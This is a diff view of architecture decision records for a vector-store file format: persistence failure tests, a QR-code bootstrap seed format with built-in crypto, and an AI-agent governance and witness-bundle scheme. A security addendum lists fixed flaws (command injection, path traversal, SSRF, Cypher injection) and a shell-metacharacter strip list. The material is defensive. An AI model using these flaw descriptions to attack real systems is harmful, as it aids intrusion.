| Migration data loss | Medium | Migrate tool has `--dry-run` and `--verify` modes. Idempotent. Never deletes source data. |
---
## Decision Matrix: Hybrid Persistence
| Criteria | Option A: Vectors in RVF, metadata in IndexedDB | Option B: Everything in IndexedDB |
|----------|----|----|
| **Durability** | High (RVF is append-only, crash-safe) | Medium (IndexedDB has no crash ordering guarantee) |
| **Simplicity** | Medium (two stores, epoch sync) | High (single store) |
| **Performance** | High (SIMD-aligned slabs, HNSW indexing) | Medium (JSON serialization) |
| **Recoverability** | High (rebuild metadata from RVF) | Medium (no independent source of truth) |
| **User surprise** | Medium (two persistence targets) | Low (familiar single-store model) |
**Decision**: Option A wins if we implement epoch reconciliation and writer leases (both specified in this ADR).
---
## Failure Modes to Test
| # | Scenario | Expected Behavior |
|---|----------|-------------------|
| 1 | Power loss during ingest | Reopen succeeds. Last committed epoch is consistent. Partial append is invisible. |
| 2 | Crash between RVF write and metadata write | Next open reconciles by epoch. Metadata rebuilt from RVF. |
| 3 | Two writers attempting to open same store | Second writer gets `ELOCK` error with clear message. |
| 4 | Migration rerun on already-migrated store | No-op. No duplication. Exit code 0. |
| 5 | Write in Node, read in browser, write, read back in Node | Top-10 nearest neighbors match within 1e-6 distance tolerance. |
| 6 | Browser refresh during write | Writer lease expires. Next open acquires fresh lease. No corruption. |
| 7 | Mixed RVF versions (v1 file opened by v2 reader) | Forward-compatible read succeeds. v1 file opened by v0 reader fails with upgrade hint. |
---
## Implementation Checklist
### npx ruvector (Phase 1)
- [x] Add backend adapter matching existing core interface exactly
- [x] Add `rvf` CLI group with create, ingest, query, status, segments, derive, compact, export
- [x] Add `rvf examples` and `rvf download` commands for example .rvf files
- [x] Add 10 RVF tools to main MCP server (rvf_create through rvf_examples)
- [x] Add hooks `--backend rvf` flag requiring explicit selection (no silent fallback)
- [x] Error messages for missing `@ruvector/rvf` include install command
- [x] Security: path validation, shell arg sanitization, redirect whitelist
- [x] Smoke test: 4 Rust integration tests (full lifecycle, cosine, multi-restart, metadata)
### rvlite (Phase 2)
- [x] Feature-flag RVF backend in Rust; default stays unchanged
- [x] Epoch reconciliation module (`crates/rvlite/src/storage/epoch.rs`)
- [x] Auto-detection of `@ruvector/rvf-wasm` in TypeScript SDK
- [x] `getStorageBackend()` and `isRvfAvailable()` exports
- [x] Security: Cypher injection prevention, relation type validation, depth clamping
- [x] Full epoch reconciliation algorithm (23 tests, `EpochTracker` with `AtomicU64`, thread-safe)
- [x] `rvf-migrate` CLI command with `--dry-run` and `--verify` modes (idempotent, 1e-6 tolerance)
- [x] `rvf-rebuild` CLI command to reconstruct metadata from RVF
- [x] Writer lease (`WriterLease` with file lock + PID-based stale detection, `BrowserWriterLease` with IndexedDB heartbeat)
- [x] Direct ID mapping: `IdMapping` trait, `DirectIdMap` (identity), `OffsetIdMap` (20 tests)
### Shared (Phase 3)
- [x] `@ruvector/rvf-wasm` as shared optional peer dependency in rvlite
- [x] CI build step (`wasm-dedup-check.yml`) fails if duplicate WASM artifacts detected
- [x] 3 MCP server rvlite tools (`rvlite_sql`, `rvlite_cypher`, `rvlite_sparql`) — read-only default
- [x] Cross-platform compatibility tests: 6 tests (cosine/L2/IP round-trip, segment preservation, byte-identical transfer)
---
## Acceptance Test
A clean machine with no prior data can:
1. `ruvector rvf create test.rvf --dimension 384`
2. `ruvector rvf ingest test.rvf --input vectors.json`
3. `ruvector rvf query test.rvf --vector "..." --k 10` -- returns results
4. Restart the process
5. `ruvector rvf query test.rvf --vector "..." --k 10` -- same results (persistence verified)
6. `rvlite rvf-migrate` converts an existing rvlite store
7. Open the migrated store in a browser via WASM
8. Top-10 nearest neighbors match Node results within 1e-6 distance tolerance
---
## Implementation Files
### npx ruvector (Phase 1)
| File | Action |
|------|--------|
| `npm/packages/ruvector/package.json` | Edit -- add `@ruvector/rvf` optional dep |
| `npm/packages/ruvector/src/index.ts` | Edit -- add RVF to platform detection with explicit backend support |
| `npm/packages/ruvector/src/core/rvf-wrapper.ts` | Create -- RVF wrapper matching core interface |
| `npm/packages/ruvector/src/core/index.ts` | Edit -- export rvf-wrapper |
| `npm/packages/ruvector/bin/cli.js` | Edit -- add `rvf` command group (~line 7010) |
### rvlite (Phase 2)
| File | Action |
|------|--------|
| `crates/rvlite/Cargo.toml` | Edit -- add optional `rvf-runtime` dep behind feature flag |
| `crates/rvlite/src/lib.rs` | Edit -- add RVF backend behind feature flag |
| `crates/rvlite/src/storage/epoch.rs` | Create -- epoch reconciliation algorithm |
| `npm/packages/rvlite/package.json` | Edit -- add `@ruvector/rvf-wasm` optional dep |
| `npm/packages/rvlite/src/index.ts` | Edit -- add `createWithRvf()` factory, migrate, rebuild |
### Shared (Phase 3)
| File | Action |
|------|--------|
| `npm/packages/rvf-mcp-server/src/server.ts` | Edit -- add rvlite query tools (read-only default) |
---
## Security Hardening (Phase 1 Addendum)
Applied security hardening across all three integration surfaces after audit.
### Vulnerabilities Addressed
| ID | Severity | Surface | Vulnerability | Fix |
|----|----------|---------|---------------|-----|
| S-01 | CRITICAL | CLI `rvf download` | Path traversal via crafted filenames | `sanitizeFileName()` + allowlist validation + path containment check |
| S-02 | CRITICAL | MCP server | Command injection via `execSync` with user args | `sanitizeShellArg()` strips shell metacharacters; numeric args parsed with `parseInt()` |
| S-03 | HIGH | MCP `rvf_*` tools | Path traversal via `args.path` | `validateRvfPath()` blocks `..`, null bytes, sensitive system paths |
| S-04 | HIGH | CLI `rvf download` | SSRF via blind redirect following | `ALLOWED_REDIRECT_HOSTS` whitelist (GitHub domains only) |
| S-05 | HIGH | CLI `rvf download` | URL injection | `encodeURIComponent()` on filenames in URLs |
| S-06 | MEDIUM | rvlite `SemanticMemory` | Cypher injection via unsanitized user strings | `sanitizeCypher()` escapes quotes/backslashes/control chars |
| S-07 | MEDIUM | rvlite `SemanticMemory` | Arbitrary relationship types in Cypher | `validateRelationType()` restricts to `[A-Za-z_][A-Za-z0-9_]*` |
| S-08 | MEDIUM | MCP server hooks | Numeric arg injection | All numeric args (`threshold`, `top_k`, `days`, etc.) parsed with `parseInt()` + fallback defaults |
| S-09 | MEDIUM | rvlite `SemanticMemory` | Graph traversal depth abuse | `findRelated()` depth clamped to `[1, 10]` |
### Security Helpers Added
**`mcp-server.js`** (3 functions):
- `validateRvfPath(filePath)` -- blocks path traversal, null bytes, and sensitive system paths
- `sanitizeShellArg(arg)` -- strips shell metacharacters (`\``, `$()`, `{}`, `|`, `;`, `&`, `<>`, `!`, `..`)
- Numeric args validated with `parseInt()` in all 15+ command handlers
**`cli.js`** (download command):
- `sanitizeFileName(name)` -- strips path separators, validates `/^[\w\-.]+$/`
- `ALLOWED_REDIRECT_HOSTS` -- whitelist: `raw.githubusercontent.com`, `objects.githubusercontent.com`, `github.com`
- Path containment: `path.resolve(dest).startsWith(path.resolve(outDir))`
- Allowlist: downloads validated against known `RVF_EXAMPLES` catalog
**`rvlite/src/index.ts`**:
- `sanitizeCypher(value)` -- escapes `\`, `"`, `'`, control characters
- `validateRelationType(rel)` -- validates `[A-Za-z_][A-Za-z0-9_]*`
### Files Modified
| File | Change |
|------|--------|
| `npm/packages/ruvector/bin/cli.js` | +25 lines: filename sanitization, redirect validation, path containment, allowlist |
| `npm/packages/ruvector/bin/mcp-server.js` | +40 lines: `validateRvfPath()`, `sanitizeShellArg()`, applied to all 25+ handlers |
| `npm/packages/rvlite/src/index.ts` | +20 lines: `sanitizeCypher()`, `validateRelationType()`, depth clamping |
---
## RVF Types Implementation (WASM Bootstrap)
The WASM self-bootstrapping types are fully implemented in `rvf-types/src/wasm_bootstrap.rs` (402 lines, 10 tests):
| Type | Size | Description |
|------|------|-------------|
| `WasmHeader` | 64 bytes (`repr(C)`) | Segment payload header with magic "RVWM" (0x5256574D), `to_bytes()`/`from_bytes()` serialization, compile-time size assertion |
| `WasmRole` | `u8` enum | Microkernel (0x00), Interpreter (0x01), Combined (0x02), Extension (0x03), ControlPlane (0x04) |
| `WasmTarget` | `u8` enum | Wasm32 (0x00), WasiP1 (0x01), WasiP2 (0x02), Browser (0x03), BareTile (0x04) |
| `WASM_FEAT_*` | 8 constants | SIMD, bulk memory, multi-value, reference types, threads, tail call, GC, exception handling |
Key fields in `WasmHeader`: `bytecode_size`, `compressed_size`, `bytecode_hash` (SHAKE-256-256), `bootstrap_priority`, `interpreter_type`, `min_memory_pages`, `max_memory_pages`.
All types are exported from `rvf-types/src/lib.rs` and available to downstream crates. The `SegmentType::Wasm = 0x10` discriminant is registered in `segment_type.rs` with `TryFrom<u8>` round-trip tests.
---
## Verification
```bash
# Phase 1: npx ruvector RVF integration
npx ruvector rvf create test.rvf --dimension 384
npx ruvector rvf ingest test.rvf --input vectors.json
npx ruvector rvf query test.rvf --vector "0.1,0.2,..." --k 10
npx ruvector rvf status test.rvf
npx ruvector hooks remember --backend rvf --store hooks.rvf "test pattern"
npx ruvector hooks recall --backend rvf --store hooks.rvf "test"
# Phase 1: Example download
npx ruvector rvf examples
npx ruvector rvf download basic_store agent_memory
npx ruvector rvf download --all -o ./rvf-examples
# Phase 2: rvlite RVF backend
cargo test -p rvlite --features rvf-backend
# npm test for rvlite with RVF factory
# Phase 3: Shared WASM
# Verify single @ruvector/rvf-wasm instance in node_modules
npm ls @ruvector/rvf-wasm
# Failure mode tests
cargo test --test rvf_crash_recovery
cargo test --test rvf_writer_lease
cargo test --test rvf_epoch_reconciliation
cargo test --test rvf_cross_platform_compat
cargo test --test rvf_migration_idempotent
```

File diff suppressed because it is too large Load Diff

View File

@@ -0,0 +1,445 @@
# ADR-034: QR Cognitive Seed — A World Inside a World
**Status**: Implemented
**Date**: 2026-02-15
**Depends on**: ADR-029 (RVF Canonical Format), ADR-030 (Cognitive Container), ADR-033 (Progressive Indexing Hardening)
**Affects**: `rvf-types`, `rvf-runtime`
**Zero external dependencies**: All crypto, compression, and FFI implemented from scratch.
---
## Context
RVF files are self-bootstrapping cognitive containers: they carry their own WASM interpreter, signed manifests, and progressive index layers. But distribution still assumes a filesystem — a URL, a disk, a cloud bucket.
What if intelligence could live in printed ink?
A QR code can carry up to 2,953 bytes (Version 40, Low EC). That's enough for:
- A 64-byte RVQS header
- A 5.5 KB WASM microkernel (LZ-compressed to ~2.1 KB)
- A 32-byte HMAC-SHA256 signature
- A 500-byte progressive download manifest with host URLs + content hashes
**Total seed: ~2,700 bytes. Fits in a single QR code with 229 bytes headroom.**
The result: scan a QR code and mount a portable brain. The AI literally exists in the data printed on a piece of paper. Offline-first, signed, verifiable, capable of bootstrapping into a streamed universe.
---
## Decision
### 1. QR Seed Format (RVQS — RuVector QR Seed)
A QR Cognitive Seed is a binary payload with this wire format:
```
Offset Size Field Description
------ ---- ----- -----------
0x000 4 seed_magic 0x52565153 ("RVQS")
0x004 2 seed_version Seed format version (1)
0x006 2 flags Seed flags (see below)
0x008 8 file_id Unique identifier for this seed
0x010 4 total_vector_count Expected vectors when fully loaded
0x014 2 dimension Vector dimensionality
0x016 1 base_dtype Base data type (DataType enum)
0x017 1 profile_id Domain profile
0x018 8 created_ns Seed creation timestamp (nanos)
0x020 4 microkernel_offset Offset to WASM microkernel data
0x024 4 microkernel_size Compressed microkernel size
0x028 4 download_manifest_offset Offset to download manifest
0x02C 4 download_manifest_size Download manifest size
0x030 2 sig_algo Signature algorithm (0=Ed25519, 1=ML-DSA-65, 2=HMAC-SHA256)
0x032 2 sig_length Signature byte length
0x034 4 total_seed_size Total payload size in bytes
0x038 8 content_hash SHA-256-64 of microkernel+manifest data
0x040 var microkernel_data LZ-compressed WASM microkernel
... var download_manifest Progressive download manifest (TLV)
... var signature Seed signature (covers 0x000..sig start)
```
#### 1.1 Seed Flags
```
Bit Name Description
--- ---- -----------
0 SEED_HAS_MICROKERNEL Embedded WASM microkernel present
1 SEED_HAS_DOWNLOAD Progressive download manifest present
2 SEED_SIGNED Payload is signed
3 SEED_OFFLINE_CAPABLE Seed is useful without network access
4 SEED_ENCRYPTED Payload is encrypted (key in TEE or passphrase)
5 SEED_COMPRESSED Microkernel is LZ-compressed
6 SEED_HAS_VECTORS Seed contains inline vector data (tiny model)
7 SEED_STREAM_UPGRADE Seed can upgrade itself via streaming
```
#### 1.2 Signature Algorithms
| ID | Algorithm | Size | Dependencies | Use Case |
|----|-----------|------|--------------|----------|
| 0 | Ed25519 | 64 B | `ed25519-dalek` | Asymmetric, production |
| 1 | ML-DSA-65 | 3,309 B | `pqcrypto` | Post-quantum (requires 2-QR) |
| 2 | HMAC-SHA256 | 32 B | **None** (built-in) | Symmetric, zero-dep default |
**sig_algo=2 (HMAC-SHA256) is implemented from scratch with zero external dependencies.**
### 2. Progressive Download Manifest
The download manifest tells the runtime how to grow from seed to full intelligence. It uses a TLV structure:
```
Tag Length Description
------ ------ -----------
0x0001 var HostEntry: Primary download host
0x0002 var HostEntry: Fallback host (up to 3)
0x0003 32 content_hash: SHA-256 of the full RVF file
0x0004 8 total_file_size: Expected size of the full RVF
0x0005 var LayerManifest: Progressive layer download order
0x0006 16 session_token: Ephemeral auth token for download
0x0007 4 ttl_seconds: Token expiry
0x0008 var CertPin: TLS certificate pin (SHA-256 of SPKI)
```
**Default layer order:**
| Priority | Layer | Size | Purpose |
|----------|-------|------|---------|
| 0 | Level 0 manifest | 4 KB | Instant boot |
| 1 | Hot cache (centroids + entry points) | ~50 KB | First query capability |
| 2 | HNSW Layer A | ~200 KB | recall >= 0.70 |
| 3 | Quantization dictionaries | ~100 KB | Compact search |
| 4 | HNSW Layer B | ~500 KB | recall >= 0.85 |
| 5 | Full vectors (warm tier) | variable | Full recall |
| 6 | HNSW Layer C | variable | recall >= 0.95 |
### 3. Bootstrap Sequence
```
┌─────────────────────────────────────────────────────────────────┐
│ QR Code (≤2,953 bytes) │
│ ┌──────────┬──────────────┬────────────┬──────────────────┐ │
│ │ RVQS Hdr │ WASM μkernel │ DL Manifest│ HMAC-SHA256 Sig │ │
│ │ 64 bytes │ ~2.1 KB (LZ) │ ~500 bytes │ 32 bytes │ │
│ └──────────┴──────────────┴────────────┴──────────────────┘ │
└─────────────────────────────────────────────────────────────────┘
┌─────────────────────────────────────────────────────────────────┐
│ Phase 0: Scan & Verify (offline, <1ms) │
│ 1. Parse RVQS header, validate magic 0x52565153 │
│ 2. Verify content hash: SHA-256(μkernel ‖ manifest)[0..8] │
│ 3. Verify HMAC-SHA256 signature (constant-time comparison) │
│ 4. Decompress WASM microkernel (built-in LZ decompressor) │
│ 5. Instantiate WASM runtime │
│ 6. Seed is now ALIVE — cognitive kernel running │
└─────────────────────────────────────────────────────────────────┘
▼ (if network available)
┌─────────────────────────────────────────────────────────────────┐
│ Phase 1: Progressive Download (background, priority-ordered) │
│ 1. Fetch Level 0 manifest (4 KB) → instant full boot │
│ 2. Fetch hot cache → first query capability (50% recall) │
│ 3. Fetch HNSW Layer A → recall ≥ 0.70 │
│ 4. Fetch remaining layers in priority order │
│ Each layer: verify SHA-256-128 content_hash → append → index │
└─────────────────────────────────────────────────────────────────┘
┌─────────────────────────────────────────────────────────────────┐
│ Phase 2: Full Intelligence │
│ 1. All layers downloaded and verified │
│ 2. Full HNSW index active, recall ≥ 0.95 │
│ 3. Seed has grown into a complete cognitive container │
│ 4. Can operate fully offline from this point │
│ 5. Can re-export as a new QR seed (with updated vectors) │
└─────────────────────────────────────────────────────────────────┘
```
### 4. Security Model
#### 4.1 Built-in Cryptography (Zero Dependencies)
All cryptographic primitives are implemented from scratch in pure Rust:
| Primitive | Implementation | Location | Tests |
|-----------|---------------|----------|-------|
| SHA-256 | FIPS 180-4 | `rvf-types/src/sha256.rs` | 11 (incl. NIST + RFC 4231 vectors) |
| HMAC-SHA256 | RFC 2104 | `rvf-types/src/sha256.rs` | 3 RFC 4231 test cases |
| Constant-time compare | XOR accumulator | `rvf-types/src/sha256.rs` | 2 |
| LZ compression | SCF-1 (4KB window) | `rvf-runtime/src/compress.rs` | 11 |
| Content hashing | SHA-256 truncated | `rvf-runtime/src/seed_crypto.rs` | 10 |
**Signature verification flow:**
```rust
let parsed = ParsedSeed::parse(&payload)?;
// Full verification: magic + content hash + HMAC signature.
parsed.verify_all(signing_key, &payload)?;
// Or step by step:
assert!(parsed.verify_content_hash());
parsed.verify_signature(signing_key, &payload)?;
let wasm = parsed.decompress_microkernel()?;
```
#### 4.2 Content Integrity
- **Seed content hash**: SHA-256(microkernel ‖ manifest) truncated to 64 bits. Stored in header at offset 0x38.
- **Layer content hashes**: SHA-256 of each layer truncated to 128 bits. Verified on download.
- **Full file hash**: SHA-256 of the complete RVF file. Stored in manifest TLV tag 0x0003.
#### 4.3 Download Security
1. **Content hashes**: Each layer has a SHA-256-128 hash. Downloaded data is verified before use.
2. **TLS certificate pinning**: SHA-256 of host's SPKI. Prevents MITM even if a CA is compromised.
3. **Session tokens**: Ephemeral 16-byte auth tokens with TTL.
4. **Host key verification**: Each HostEntry contains the host's public key hash.
### 5. Mobile Integration
#### 5.1 iOS App Clip — Scan. Boot. Intelligence.
The strongest UX story: QR opens an App Clip instantly, no install.
```
User scans QR with iOS Camera
iOS launches App Clip instantly (no App Store, no login)
┌─────────────────────────────────────────┐
│ App Clip (~50 KB RVF static library) │
│ │
│ 1. rvqs_parse_header() — read RVQS │
│ 2. rvqs_verify_signature() — HMAC │
│ 3. rvqs_verify_content_hash() — SHA256 │
│ 4. rvqs_decompress_microkernel() — LZ │
│ 5. Mount WASM runtime │
│ 6. rvqs_get_primary_host_url() │
│ 7. Stream layers → progressive recall │
└─────────────────────────────────────────┘
User sees intelligence in <2 seconds
Optional: "Get Full App" upgrade path
```
The App Clip contains the compiled `rvf-runtime` as a static library linked via C FFI:
```swift
// Swift calling the Rust FFI
var header = RvqsHeaderC()
let rc = rvqs_parse_header(qrData.baseAddress, qrData.count, &header)
guard rc == RVQS_OK else { return }
let verifyRc = rvqs_verify_signature(qrData.baseAddress, qrData.count,
key.baseAddress, key.count)
guard verifyRc == RVQS_OK else { showError("Invalid signature"); return }
```
**Build for iOS:**
```bash
cargo build --release --target aarch64-apple-ios --lib
cargo build --release --target aarch64-apple-ios-sim --lib
```
#### 5.2 Web App — Zero App Store
For zero App Store involvement, the QR URL opens a Progressive Web App:
```
QR contains: https://brain.ruvector.ai/s/{seed-id}
Browser opens instantly (Safari, Chrome)
┌─────────────────────────────────────────┐
│ PWA with WASM RVF Loader │
│ │
│ 1. Fetch RVQS seed from URL path │
│ 2. Parse + verify in WASM │
│ 3. Decompress microkernel │
│ 4. Stream layers via fetch() API │
│ 5. Render intelligence in browser │
│ │
│ Works offline via Service Worker cache │
└─────────────────────────────────────────┘
```
**Build for WASM:**
```bash
cargo build --release --target wasm32-unknown-unknown --lib
```
The RVF loader compiles to ~50 KB WASM. Service Worker caches the loader + downloaded layers for offline use.
#### 5.3 Android
Same C FFI approach, compiled for NDK targets:
```bash
cargo build --release --target aarch64-linux-android --lib
```
Called from Kotlin via JNI or from a WebView with the WASM build.
#### 5.4 Delivery Comparison
| Method | Install Required | App Store Review | Boot Time | Offline |
|--------|-----------------|-----------------|-----------|---------|
| App Clip (iOS) | No | Yes (light) | <1s | Yes |
| PWA / Web App | No | No | ~2s | Yes (SW) |
| Android Instant App | No | Yes | <1s | Yes |
| Full native app | Yes | Yes | N/A | Yes |
### 6. C FFI Reference
The following `extern "C"` functions are exported for mobile integration:
```c
// Parse the 64-byte header from a QR seed payload.
int rvqs_parse_header(const uint8_t* data, size_t data_len, RvqsHeaderC* out);
// Verify HMAC-SHA256 signature. Returns RVQS_OK (0) or error code.
int rvqs_verify_signature(const uint8_t* data, size_t data_len,
const uint8_t* key, size_t key_len);
// Verify content hash integrity. Returns RVQS_OK (0) or error code.
int rvqs_verify_content_hash(const uint8_t* data, size_t data_len);
// Decompress the embedded microkernel into caller's buffer.
int rvqs_decompress_microkernel(const uint8_t* data, size_t data_len,
uint8_t* out, size_t out_cap, size_t* out_len);
// Extract the primary download URL from the manifest.
int rvqs_get_primary_host_url(const uint8_t* data, size_t data_len,
uint8_t* url_buf, size_t url_cap, size_t* url_len);
```
**Error codes:**
| Code | Name | Meaning |
|------|------|---------|
| 0 | RVQS_OK | Success |
| -1 | RVQS_ERR_NULL_PTR | Null pointer argument |
| -2 | RVQS_ERR_TOO_SHORT | Payload smaller than header |
| -3 | RVQS_ERR_BAD_MAGIC | Invalid RVQS magic bytes |
| -4 | RVQS_ERR_SIGNATURE_INVALID | Signature verification failed |
| -5 | RVQS_ERR_HASH_MISMATCH | Content hash doesn't match data |
| -6 | RVQS_ERR_DECOMPRESS_FAIL | LZ decompression failed |
| -7 | RVQS_ERR_BUFFER_TOO_SMALL | Caller's buffer too small |
| -8 | RVQS_ERR_PARSE_FAIL | General parse failure |
### 7. Size Budget (Actual Measured)
```
Component Raw Size Compressed In QR
───────────────────────── ──────── ────────── ─────
RVQS Header 64 B 64 B 64 B
WASM Microkernel 5,500 B 2,095 B 2,095 B
Download Manifest (2 hosts) 496 B 496 B 496 B
HMAC-SHA256 Signature 32 B 32 B 32 B
───────────────────────── ──────── ────────── ─────
Total (measured) 2,687 B
QR Version 40, Low EC capacity: 2,953 B
Remaining headroom: 266 B
```
### 8. Example Use Cases
#### 8.1 Business Card Brain
Print a QR code on a business card. Scan it to mount a personal AI assistant that knows your work, your papers, your projects. Offline-first. When connected, it streams your full knowledge base.
#### 8.2 Medical Record Seed
A QR code on a patient wristband contains a signed seed pointing to their medical vector index. Scan to query drug interactions, allergies, treatment history. Works offline in the ER.
#### 8.3 Firmware Intelligence
Embedded in a product's QR code: a cognitive seed that can diagnose problems, suggest fixes, and stream updated knowledge from the manufacturer.
#### 8.4 Paper Backup
Print your AI's seed on paper. Store it in a safe. In a disaster, scan the paper and your AI bootstraps from printed ink. The signature proves it's yours.
#### 8.5 Conference Badge
NFC/QR on a conference badge. Tap to mount the speaker's research brain. Walk around, scan badges, collect intelligences. Each one is signed by the speaker.
---
## Implementation
### Files
| File | Lines | Purpose |
|------|-------|---------|
| `rvf-types/src/sha256.rs` | 230 | Pure SHA-256 (FIPS 180-4) + HMAC-SHA256 (RFC 2104) |
| `rvf-types/src/qr_seed.rs` | 370 | RVQS wire format types, SeedHeader, LayerEntry, HostEntry |
| `rvf-runtime/src/compress.rs` | 210 | LZ77 compression (SCF-1 format, 4KB window) |
| `rvf-runtime/src/seed_crypto.rs` | 100 | Sign, verify, content/layer hashing |
| `rvf-runtime/src/qr_seed.rs` | 1050 | SeedBuilder, ParsedSeed, TLV manifest, bootstrap progress |
| `rvf-runtime/src/ffi.rs` | 240 | C FFI for App Clip / mobile (5 exported functions) |
| `rvf-runtime/examples/qr_seed_bootstrap.rs` | 250 | Full demo: build → sign → parse → verify → decompress → bootstrap |
| `rvf-runtime/tests/qr_seed_e2e.rs` | 220 | 11 end-to-end integration tests |
### Test Coverage
| Module | Tests | Verified Against |
|--------|-------|-----------------|
| SHA-256 | 11 | NIST FIPS 180-4 test vectors |
| HMAC-SHA256 | 3 | RFC 4231 test cases 1, 2, 5 |
| LZ compression | 11 | Round-trip + WASM patterns |
| Seed crypto | 10 | Sign/verify/tamper detection |
| QR seed types | 9 | Header round-trip, flags, magic |
| QR seed runtime | 12 | Builder, parser, manifest TLV |
| C FFI | 7 | Parse, verify, decompress, URL extract |
| E2E integration | 11 | Full pipeline with real crypto |
**Total: 74 QR seed tests, all passing.**
---
## Consequences
### Positive
- Intelligence becomes **physically portable** — printed on paper, etched in metal, tattooed on skin
- **Zero external dependencies** — SHA-256, HMAC, LZ compression, FFI all built from scratch
- **Mobile-first** — App Clip (iOS), PWA (web), Instant App (Android) all supported via C FFI
- **Offline-first** by design — the seed is useful before any network access
- **Cryptographically verified** — HMAC-SHA256 signatures with constant-time comparison
- **Progressive loading** — first query at 50% recall after 6% download
- **Self-upgrading** — a seed can re-export itself with new knowledge
### Negative
- QR capacity limits seed size to ~2,900 bytes
- HMAC-SHA256 requires a shared secret (symmetric); for asymmetric signatures, add `ed25519-dalek` as optional dep
- Download manifest URLs have finite TTL — seeds expire unless hosts are stable
- Built-in LZ compression is simpler than Brotli (~1.4-2.5x vs ~3-4x ratio)
### Migration
- Existing RVF files can generate QR seeds via `SeedBuilder::new().compress_microkernel(&wasm).build_and_sign(key)`
- QR seeds bootstrap into standard RVF files — no special runtime needed
- Seeds are forward-compatible: unknown TLV tags are ignored by older runtimes
---
## References
- QR Code Specification: ISO/IEC 18004:2015
- SHA-256: FIPS 180-4
- HMAC: RFC 2104
- HMAC-SHA256 Test Vectors: RFC 4231
- Apple App Clips: developer.apple.com/app-clips
- RVF Spec 02: Manifest System (Level 0 / Level 1)
- RVF Spec 11: WASM Self-Bootstrapping
- ADR-029: RVF Canonical Format
- ADR-030: Cognitive Container
- ADR-033: Progressive Indexing Hardening

View File

@@ -0,0 +1,226 @@
# ADR-035: Capability Report — Witness Bundles, Scorecards, and Governance
**Status**: Implemented
**Date**: 2026-02-15
**Depends on**: ADR-034 (QR Cognitive Seed), SHA-256, HMAC-SHA256
## Context
Claims without evidence are noise. This ADR defines the proof infrastructure:
a signed, self-contained witness bundle per task execution, aggregated into
capability scorecards, and governed by enforceable policy modes.
The acceptance test: run 100 real repo issues with a fixed policy.
"Prove capability" means 60+ solved with passing tests, zero unsafe actions,
and every solved task has a replayable witness bundle.
## 1. Witness Bundle
### 1.1 Wire Format
A witness bundle is a binary blob: 64-byte header + TLV sections + optional
32-byte HMAC-SHA256 signature.
```
+-------------------+-------------------+-------------------+
| WitnessHeader | TLV Sections | Signature (opt) |
| 64 bytes | variable | 32 bytes |
+-------------------+-------------------+-------------------+
```
### 1.2 Header Layout (64 bytes, `repr(C)`)
| Offset | Type | Field |
|--------|-----------|--------------------------|
| 0x00 | u32 | magic (0x52575657 "RVWW")|
| 0x04 | u16 | version (1) |
| 0x06 | u16 | flags |
| 0x08 | [u8; 16] | task_id (UUID) |
| 0x18 | [u8; 8] | policy_hash |
| 0x20 | u64 | created_ns |
| 0x28 | u8 | outcome |
| 0x29 | u8 | governance_mode |
| 0x2A | u16 | tool_call_count |
| 0x2C | u32 | total_cost_microdollars |
| 0x30 | u32 | total_latency_ms |
| 0x34 | u32 | total_tokens |
| 0x38 | u16 | retry_count |
| 0x3A | u16 | section_count |
| 0x3C | u32 | total_bundle_size |
### 1.3 TLV Sections
Each section: `tag(u16) + length(u32) + value(length bytes)`.
| Tag | Name | Content |
|--------|---------------|----------------------------------------------|
| 0x0001 | SPEC | Task prompt / issue text (UTF-8) |
| 0x0002 | PLAN | Plan graph (text or structured) |
| 0x0003 | TRACE | Array of ToolCallEntry records |
| 0x0004 | DIFF | Unified diff output |
| 0x0005 | TEST_LOG | Test runner output |
| 0x0006 | POSTMORTEM | Failure analysis (if outcome != Solved) |
Unknown tags are ignored (forward-compatible).
### 1.4 ToolCallEntry (variable length)
| Offset | Type | Field |
|--------|-----------|--------------------|
| 0x00 | u16 | action_len |
| 0x02 | u8 | policy_check |
| 0x03 | u8 | _pad |
| 0x04 | [u8; 8] | args_hash |
| 0x0C | [u8; 8] | result_hash |
| 0x14 | u32 | latency_ms |
| 0x18 | u32 | cost_microdollars |
| 0x1C | u32 | tokens |
| 0x20 | [u8; N] | action (UTF-8) |
### 1.5 Signature
HMAC-SHA256 over the unsigned payload (header + sections, before signature).
Same primitive used by ADR-034 QR seeds. Zero external dependencies.
### 1.6 Evidence Completeness
A witness bundle is "evidence complete" when it contains all three:
SPEC + DIFF + TEST_LOG. Incomplete bundles are valid but reduce the
evidence coverage score.
## 2. Task Outcomes
| Value | Name | Meaning |
|-------|---------|-----------------------------------------------|
| 0 | Solved | Tests pass, diff merged or mergeable |
| 1 | Failed | Tests fail or diff rejected |
| 2 | Skipped | Precondition not met |
| 3 | Error | Infrastructure or tool failure |
## 3. Governance Modes
Three enforcement levels, each with a deterministic policy hash:
### 3.1 Restricted (mode=0)
- **Read-only** plus suggestions
- Allowed tools: Read, Glob, Grep, WebFetch, WebSearch
- Denied tools: Bash, Write, Edit
- Max cost: $0.01
- Max tool calls: 50
- Use case: security audit, code review
### 3.2 Approved (mode=1)
- **Writes allowed** with human confirmation gates
- All tool calls return PolicyCheck::Confirmed
- Max cost: $0.10
- Max tool calls: 200
- Use case: production deployments, sensitive repos
### 3.3 Autonomous (mode=2)
- **Bounded authority** with automatic rollback on violation
- All tool calls return PolicyCheck::Allowed
- Max cost: $1.00
- Max tool calls: 500
- Use case: CI/CD pipelines, nightly runs
### 3.4 Policy Hash
SHA-256 of the serialized policy (mode + tool lists + budgets), truncated
to 8 bytes. Stored in the witness header. Any policy change produces a
different hash, preventing silent drift.
### 3.5 Policy Enforcement
Tool calls are checked at record time:
1. Deny list checked first (always blocks)
2. Mode-specific check:
- Restricted: must be in allow list
- Approved: all return Confirmed
- Autonomous: all return Allowed
3. Cost budget checked after each call
4. Tool call count budget checked after each call
5. All violations recorded in the witness builder
## 4. Scorecard
Aggregate metrics across witness bundles.
| Metric | Type | Description |
|---------------------------|-------|---------------------------------------|
| total_tasks | u32 | Total tasks attempted |
| solved | u32 | Tasks with passing tests |
| failed | u32 | Tasks with failing tests |
| skipped | u32 | Tasks skipped |
| errors | u32 | Infrastructure errors |
| policy_violations | u32 | Total policy violations |
| rollback_count | u32 | Total rollbacks performed |
| total_cost_microdollars | u64 | Total cost |
| median_latency_ms | u32 | Median wall-clock latency |
| p95_latency_ms | u32 | 95th percentile latency |
| total_tokens | u64 | Total tokens consumed |
| total_retries | u32 | Total retries across all tasks |
| evidence_coverage | f32 | Fraction of solved with full evidence |
| cost_per_solve | u32 | Avg cost per solved task |
| solve_rate | f32 | solved / total_tasks |
### 4.1 Acceptance Criteria
| Metric | Threshold | Rationale |
|----------------------|-----------|----------------------------------|
| solve_rate | >= 0.60 | 60/100 solved |
